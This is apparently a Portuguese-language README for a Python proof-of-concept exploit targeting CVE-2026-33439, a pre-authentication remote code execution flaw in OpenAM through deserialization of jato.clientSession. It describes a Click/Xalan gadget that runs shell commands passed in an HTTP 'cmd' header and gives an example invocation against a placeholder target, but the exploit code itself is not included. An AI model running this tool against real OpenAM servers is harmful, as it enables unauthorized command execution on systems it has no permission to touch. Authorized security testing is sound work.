
PoC em Python para CVE-2026-33439, um RCE de pré-autenticação no OpenAM via desserialização de jato.clientSession
Prova de conceito em Python autónoma para a vulnerabilidade de execução remota de código de pré-autenticação no OpenAM na desserialização de jato.clientSession.
O gadget Click/Xalan incorporado lê um comando de shell a partir do cabeçalho HTTP cmd e devolve a sua saída na resposta HTTP. Não são necessários pacotes Python externos, runtime Java ou ficheiros JAR.
python3 exploit.py \
--url https://target.example/openam/ui/PWResetUserValidation \
'id'
Argumentos opcionais:
--timeout SECONDS Request timeout (default: 15)
--proxy URL HTTP proxy, for example http://127.0.0.1:8080
--verify-tls Enable TLS certificate verification
Utilize apenas contra sistemas que lhe pertencem ou para os quais tem autorização explícita para testar.